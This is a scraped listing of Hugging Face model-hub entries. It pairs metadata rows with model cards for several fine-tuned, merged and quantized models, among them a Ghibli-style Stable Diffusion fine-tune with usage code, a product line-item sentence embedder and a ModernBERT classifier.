- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Inect2/loop_silver_experience | Inect2 | 2025-05-30T07:26:11Z | 0 | 0 | null | [
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:finetune:black-forest-labs/FLUX.1-dev",
"region:us"
] | null | 2025-05-07T09:54:16Z | ---
base_model:
- black-forest-labs/FLUX.1-dev
trigger_word:
- vxq9_loop
dataset:
- https://images.inku.tech/datasets/771eec74-d034-405f-85ca-05088823888f
--- |
tinycompany/Qwentify3-1.6b-adibun-it-base | tinycompany | 2025-05-30T07:26:10Z | 0 | 0 | null | [
"safetensors",
"qwen3",
"license:apache-2.0",
"region:us"
] | null | 2025-05-30T07:14:29Z | ---
license: apache-2.0
---
|
pot99rta/DarkThink-DirectiveReasoner-12B | pot99rta | 2025-05-30T07:20:46Z | 10 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"mergekit",
"merge",
"conversational",
"arxiv:2306.01708",
"base_model:ReadyArt/Omega-Darker_The-Final-Directive-12B",
"base_model:merge:ReadyArt/Omega-Darker_The-Final-Directive-12B",
"base_model:pot99rta/MagcarpMell-ThinkandReasoner-12B",
"base_model:merge:pot99rta/MagcarpMell-ThinkandReasoner-12B",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-29T21:01:21Z | ---
base_model:
- pot99rta/MagcarpMell-ThinkandReasoner-12B
- ReadyArt/Omega-Darker_The-Final-Directive-12B
library_name: transformers
tags:
- mergekit
- merge
---
# DarkThink-DirectiveReasoner-12B

More Robust with all the Darkness added.
```Models Merged:```
```1. ReadyArt/Omega-Darker_The-Final-Directive-12B```
```2. pot99rta/MagcarpMell-ThinkandReasoner-12B```
```Preset:```
```Use ChatML or Mistral```
ChatML works better for reasoning due to Magicap and MagMell being ChatML for their base Models.
Just realized I've been spelling Magcap with 'Magcarp' this WHOLE time..
# merge
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
## Merge Details
### Merge Method
This model was merged using the [TIES](https://arxiv.org/abs/2306.01708) merge method using [ReadyArt/Omega-Darker_The-Final-Directive-12B](https://huggingface.co/ReadyArt/Omega-Darker_The-Final-Directive-12B) as a base.
### Models Merged
The following models were included in the merge:
* [pot99rta/MagcarpMell-ThinkandReasoner-12B](https://huggingface.co/pot99rta/MagcarpMell-ThinkandReasoner-12B)
### Configuration
The following YAML configuration was used to produce this model:
```yaml
models:
- model: ReadyArt/Omega-Darker_The-Final-Directive-12B
#no parameters necessary for base model
- model: ReadyArt/Omega-Darker_The-Final-Directive-12B
parameters:
density: 0.5
weight: 0.5
- model: pot99rta/MagcarpMell-ThinkandReasoner-12B
parameters:
density: 0.5
weight: 0.5
merge_method: ties
base_model: ReadyArt/Omega-Darker_The-Final-Directive-12B
parameters:
normalize: false
int8_mask: true
dtype: float16
```
|
hyunjong7/gemma-product-description_27b_1600 | hyunjong7 | 2025-05-30T07:19:13Z | 0 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:google/gemma-3-27b-pt",
"base_model:finetune:google/gemma-3-27b-pt",
"endpoints_compatible",
"region:us"
] | null | 2025-05-27T06:31:54Z | ---
base_model: google/gemma-3-27b-pt
library_name: transformers
model_name: gemma-product-description_27b_1600
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for gemma-product-description_27b_1600
This model is a fine-tuned version of [google/gemma-3-27b-pt](https://huggingface.co/google/gemma-3-27b-pt).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="hyunjong7/gemma-product-description_27b_1600", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.18.0
- Transformers: 4.52.3
- Pytorch: 2.7.0
- Datasets: 3.3.2
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
tomerRest/line_item_embeddings | tomerRest | 2025-05-30T07:18:53Z | 31 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:54000",
"loss:CosineSimilarityLoss",
"arxiv:1908.10084",
"base_model:sentence-transformers/all-MiniLM-L6-v2",
"base_model:finetune:sentence-transformers/all-MiniLM-L6-v2",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] | sentence-similarity | 2025-05-30T07:17:26Z | ---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:54000
- loss:CosineSimilarityLoss
base_model: sentence-transformers/all-MiniLM-L6-v2
widget:
- source_sentence: N/GOUR WHT SOURDOUGH SLICED 750G
sentences:
- FISH TEMPURA 115GM X 30PCS
- BRIOCHE SQ SWICH LARGE
- CASSAVA CRACKER 250GM Maxi
- source_sentence: MUFFINS RASPBERRY & WHITE CHOCOLATE
sentences:
- Soft Dinner Roll 35 50pcs
- Lemon Meringue Donut
- 400 GRADI MALLOREDDUS PTN TRAY (15)
- source_sentence: Blue Swimmer Crab 140g+, 1kg pack, 6kg carton (Imported)
sentences:
- CANOLA OIL SPRAY PINNACLE 450G
- Cayenne Red 1KG
- THE BOTANIST GIN (1X700ML)
- source_sentence: Bistro oyster Tasmanian
sentences:
- Broken Prawn Meat
- CHEESE RICOTTA 1KG RED BASKET VAC
- '[DESSERTS) EQ Ice Cream Bacio (4kg/tub)'
- source_sentence: Apple Crumble Muffin
sentences:
- DICED BEEF
- GAROFALO PAPPARDELLE NO.1-35 [500GR/PKT] [12/CTN]
- Vegan Lemon Blueberry Friand -6pk
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on sentence-transformers/all-MiniLM-L6-v2
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [sentence-transformers/all-MiniLM-L6-v2](https://huggingface.co/sentence-transformers/all-MiniLM-L6-v2). It maps sentences & paragraphs to a 384-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [sentence-transformers/all-MiniLM-L6-v2](https://huggingface.co/sentence-transformers/all-MiniLM-L6-v2) <!-- at revision c9745ed1d9f207416be6d2e6f8de32d1f16199bf -->
- **Maximum Sequence Length:** 256 tokens
- **Output Dimensionality:** 384 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 256, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 384, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("tomerRest/line_item_embeddings")
# Run inference
sentences = [
'Apple Crumble Muffin',
'Vegan Lemon Blueberry Friand -6pk',
'GAROFALO PAPPARDELLE NO.1-35 [500GR/PKT] [12/CTN]',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 384]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### Unnamed Dataset
* Size: 54,000 training samples
* Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
* Approximate statistics based on the first 1000 samples:
| | sentence_0 | sentence_1 | label |
|:--------|:----------------------------------------------------------------------------------|:---------------------------------------------------------------------------------|:--------------------------------------------------------------|
| type | string | string | float |
| details | <ul><li>min: 4 tokens</li><li>mean: 11.64 tokens</li><li>max: 40 tokens</li></ul> | <ul><li>min: 3 tokens</li><li>mean: 12.0 tokens</li><li>max: 35 tokens</li></ul> | <ul><li>min: 0.0</li><li>mean: 0.5</li><li>max: 1.0</li></ul> |
* Samples:
| sentence_0 | sentence_1 | label |
|:------------------------------------------------|:-------------------------------------|:-----------------|
| <code>HTARB TARRAGON BUNCH</code> | <code>Chives - Garlic</code> | <code>1.0</code> |
| <code>CHICKEN THIGH BURGER CUT 140G</code> | <code>Herb (N-Z)-Parilla</code> | <code>0.0</code> |
| <code>12.5kg Self Raising Flour-SUNFIELD</code> | <code>ISM SALT SACHETS 2000'S</code> | <code>0.0</code> |
* Loss: [<code>CosineSimilarityLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cosinesimilarityloss) with these parameters:
```json
{
"loss_fct": "torch.nn.modules.loss.MSELoss"
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 32
- `per_device_eval_batch_size`: 32
- `num_train_epochs`: 4
- `multi_dataset_batch_sampler`: round_robin
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 32
- `per_device_eval_batch_size`: 32
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 5e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1
- `num_train_epochs`: 4
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.0
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: False
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `dispatch_batches`: None
- `split_batches`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: batch_sampler
- `multi_dataset_batch_sampler`: round_robin
</details>
### Training Logs
| Epoch | Step | Training Loss |
|:------:|:----:|:-------------:|
| 0.2962 | 500 | 0.1769 |
| 0.5924 | 1000 | 0.1269 |
| 0.8886 | 1500 | 0.1018 |
| 1.1848 | 2000 | 0.0838 |
| 1.4810 | 2500 | 0.0725 |
| 1.7773 | 3000 | 0.0623 |
| 2.0735 | 3500 | 0.056 |
| 2.3697 | 4000 | 0.0478 |
| 2.6659 | 4500 | 0.0485 |
| 2.9621 | 5000 | 0.0457 |
| 3.2583 | 5500 | 0.0412 |
| 3.5545 | 6000 | 0.0406 |
| 3.8507 | 6500 | 0.039 |
### Framework Versions
- Python: 3.12.7
- Sentence Transformers: 3.3.1
- Transformers: 4.49.0
- PyTorch: 2.6.0
- Accelerate: 1.4.0
- Datasets: 3.4.1
- Tokenizers: 0.21.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
suzii/gemma-3-4B-function-calling-v0.1 | suzii | 2025-05-30T07:17:23Z | 3 | 0 | transformers | [
"transformers",
"safetensors",
"gemma3",
"image-text-to-text",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"base_model:unsloth/gemma-3-4b-it-unsloth-bnb-4bit",
"base_model:finetune:unsloth/gemma-3-4b-it-unsloth-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | image-text-to-text | 2025-05-30T07:15:00Z | ---
base_model: unsloth/gemma-3-4b-it-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- gemma3
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** suzii
- **License:** apache-2.0
- **Finetuned from model :** unsloth/gemma-3-4b-it-unsloth-bnb-4bit
This gemma3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
danhtran2mind/ghibli-fine-tuned-sd-2.1 | danhtran2mind | 2025-05-30T07:17:01Z | 33 | 0 | diffusers | [
"diffusers",
"tensorboard",
"safetensors",
"ghibli",
"text2image",
"text-to-image",
"en",
"dataset:uwunish/ghibli-dataset",
"base_model:stabilityai/stable-diffusion-2-1-base",
"base_model:finetune:stabilityai/stable-diffusion-2-1-base",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2025-04-19T03:51:57Z | ---
license: mit
datasets:
- uwunish/ghibli-dataset
language:
- en
base_model:
- stabilityai/stable-diffusion-2-1-base
pipeline_tag: text-to-image
library_name: diffusers
tags:
- ghibli
- text2image
---
<div align="center">
<h1>
Ghibli Fine-Tuned Stable Diffusion 2.1
</h1>
</div>
## Dataset
Avalible at: https://huggingface.co/datasets/uwunish/ghibli-dataset.
## Hyperparameters
The fine-tuning process was optimized with the following hyperparameters:
| Hyperparameter | Value |
| --- | --- |
| `learning_rate` | 1e-05 |
| `num_train_epochs` | 40 |
| `train_batch_size` | 2 |
| `gradient_accumulation_steps` | 2 |
| `mixed_precision` | "fp16" |
| `resolution` | 512 |
| `max_grad_norm` | 1 |
| `lr_scheduler` | "constant" |
| `lr_warmup_steps` | 0 |
| `checkpoints_total_limit` | 1 |
| `use_ema` | True |
| `use_8bit_adam` | True |
| `center_crop` | True |
| `random_flip` | True |
| `gradient_checkpointing` | True |
These parameters were carefully selected to balance training efficiency and model performance, leveraging techniques like mixed precision and gradient checkpointing.
## Metrics
The fine-tuning process achieved a final loss of **0.0345**, indicating excellent convergence and high fidelity to the Ghibli art style.
## Usage
### Step 1: Import Required Libraries
Begin by importing the necessary libraries to power the image generation pipeline.
```python
import torch
from PIL import Image
import numpy as np
from transformers import CLIPTextModel, CLIPTokenizer
from diffusers import AutoencoderKL, UNet2DConditionModel, PNDMScheduler
from tqdm import tqdm
```
### Step 2: Configure the Model
Set up the device, data type, and load the pre-trained Ghibli-fine-tuned Stable Diffusion model.
```python
# Configure device and data type
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
dtype = torch.float16 if torch.cuda.is_available() else torch.float32
# Model path
model_name = "danhtran2mind/ghibli-fine-tuned-sd-2.1"
# Load model components
vae = AutoencoderKL.from_pretrained(model_name, subfolder="vae", torch_dtype=dtype).to(device)
tokenizer = CLIPTokenizer.from_pretrained(model_name, subfolder="tokenizer")
text_encoder = CLIPTextModel.from_pretrained(model_name, subfolder="text_encoder", torch_dtype=dtype).to(device)
unet = UNet2DConditionModel.from_pretrained(model_name, subfolder="unet", torch_dtype=dtype).to(device)
scheduler = PNDMScheduler.from_pretrained(model_name, subfolder="scheduler")
```
### Step 3: Define the Image Generation Function
Use the following function to generate Ghibli-style images based on your text prompts.
```python
def generate_image(prompt, height=512, width=512, num_inference_steps=50, guidance_scale=3.5, seed=42):
"""Generate a Ghibli-style image from a text prompt."""
# Set random seed for reproducibility
generator = torch.Generator(device=device).manual_seed(int(seed))
# Tokenize and encode the prompt
text_input = tokenizer(
[prompt], padding="max_length", max_length=tokenizer.model_max_length, truncation=True, return_tensors="pt"
)
with torch.no_grad():
text_embeddings = text_encoder(text_input.input_ids.to(device))[0].to(dtype=dtype)
# Encode an empty prompt for classifier-free guidance
uncond_input = tokenizer(
[""], padding="max_length", max_length=text_input.input_ids.shape[-1], return_tensors="pt"
)
with torch.no_grad():
uncond_embeddings = text_encoder(uncond_input.input_ids.to(device))[0].to(dtype=dtype)
text_embeddings = torch.cat([uncond_embeddings, text_embeddings])
# Initialize latent representations
latents = torch.randn(
(1, unet.config.in_channels, height // 8, width // 8),
generator=generator,
dtype=dtype,
device=device
)
# Configure scheduler timesteps
scheduler.set_timesteps(num_inference_steps)
latents = latents * scheduler.init_noise_sigma
# Denoising loop
for t in tqdm(scheduler.timesteps, desc="Generating image"):
latent_model_input = torch.cat([latents] * 2)
latent_model_input = scheduler.scale_model_input(latent_model_input, t)
with torch.no_grad():
if device.type == "cuda":
with torch.autocast(device_type="cuda", dtype=torch.float16):
noise_pred = unet(latent_model_input, t, encoder_hidden_states=text_embeddings).sample
else:
noise_pred = unet(latent_model_input, t, encoder_hidden_states=text_embeddings).sample
# Apply classifier-free guidance
noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)
noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)
latents = scheduler.step(noise_pred, t, latents).prev_sample
# Decode latents to image
with torch.no_grad():
latents = latents / vae.config.scaling_factor
image = vae.decode(latents).sample
# Convert to PIL Image
image = (image / 2 + 0.5).clamp(0, 1)
image = image.detach().cpu().permute(0, 2, 3, 1).numpy()
image = (image * 255).round().astype("uint8")
return Image.fromarray(image[0])
```
### Step 4: Generate Your Image
Craft a vivid prompt and generate your Ghibli-style masterpiece.
```python
# Example prompt
prompt = "a serene landscape in Ghibli style"
# Generate the image
image = generate_image(
prompt=prompt,
height=512,
width=512,
num_inference_steps=50,
guidance_scale=3.5,
seed=42
)
# Display or save the image
image.show() # Or image.save("ghibli_landscape.png")
```
## Environment
The project was developed and tested in the following environment:
- **Python Version**: 3.11.11
- **Dependencies**:
| Library | Version |
| --- | --- |
| huggingface-hub | 0.30.2 |
| accelerate | 1.3.0 |
| bitsandbytes | 0.45.5 |
| torch | 2.5.1 |
| Pillow | 11.1.0 |
| numpy | 1.26.4 |
| transformers | 4.51.1 |
| torchvision | 0.20.1 |
| diffusers | 0.33.1 |
| gradio | Latest |
Ensure your environment matches these specifications to avoid compatibility issues. |
DevQuasar/huihui-ai.AceReason-Nemotron-14B-abliterated-GGUF | DevQuasar | 2025-05-30T07:14:33Z | 8 | 0 | null | [
"gguf",
"text-generation",
"base_model:huihui-ai/AceReason-Nemotron-14B-abliterated",
"base_model:quantized:huihui-ai/AceReason-Nemotron-14B-abliterated",
"endpoints_compatible",
"region:us",
"conversational"
] | text-generation | 2025-05-30T04:43:14Z | ---
base_model:
- huihui-ai/AceReason-Nemotron-14B-abliterated
pipeline_tag: text-generation
---
[<img src="https://raw.githubusercontent.com/csabakecskemeti/devquasar/main/dq_logo_black-transparent.png" width="200"/>](https://devquasar.com)
Quantized version of: [huihui-ai/AceReason-Nemotron-14B-abliterated](https://huggingface.co/huihui-ai/AceReason-Nemotron-14B-abliterated)
'Make knowledge free for everyone'
<p align="center">
Made with <br>
<a href="https://www.civo.com/" target="_blank">
<img src="https://www.civo.com/assets/public/brand-assets/civo-logo-colour-60cc1622dedf346f7afde1fff760523f731b0aac106a5465af98ff4073114b74.svg" width="100"/>
</a>
</p>
<a href='https://ko-fi.com/L4L416YX7C' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi6.png?v=6' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
|
gajratej/beacon-product-classifier | gajratej | 2025-05-30T07:09:00Z | 0 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"modernbert",
"text-classification",
"generated_from_trainer",
"base_model:answerdotai/ModernBERT-base",
"base_model:finetune:answerdotai/ModernBERT-base",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-05-30T07:07:29Z | ---
library_name: transformers
license: apache-2.0
base_model: answerdotai/ModernBERT-base
tags:
- generated_from_trainer
metrics:
- f1
model-index:
- name: beacon-product-classifier
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# beacon-product-classifier
This model is a fine-tuned version of [answerdotai/ModernBERT-base](https://huggingface.co/answerdotai/ModernBERT-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2594
- F1: 0.9876
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 16
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| No log | 1.0 | 6 | 0.1665 | 1.0 |
| No log | 2.0 | 12 | 0.2268 | 0.9712 |
| No log | 3.0 | 18 | 0.5088 | 0.9135 |
| No log | 4.0 | 24 | 0.2909 | 0.9712 |
| No log | 5.0 | 30 | 0.2594 | 0.9876 |
### Framework versions
- Transformers 4.48.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.1.0
- Tokenizers 0.21.0
|
LaaP-ai/finvix1.1-0.5-4int | LaaP-ai | 2025-05-30T07:05:08Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen2",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T07:04:53Z | ---
base_model: unsloth/qwen2.5-0.5b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** LaaP-ai
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen2.5-0.5b-instruct-unsloth-bnb-4bit
This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
tonnu/a5a6ef5b-a9da-48b7-8f14-392c5b16134f | tonnu | 2025-05-30T07:01:02Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-05-30T06:49:01Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
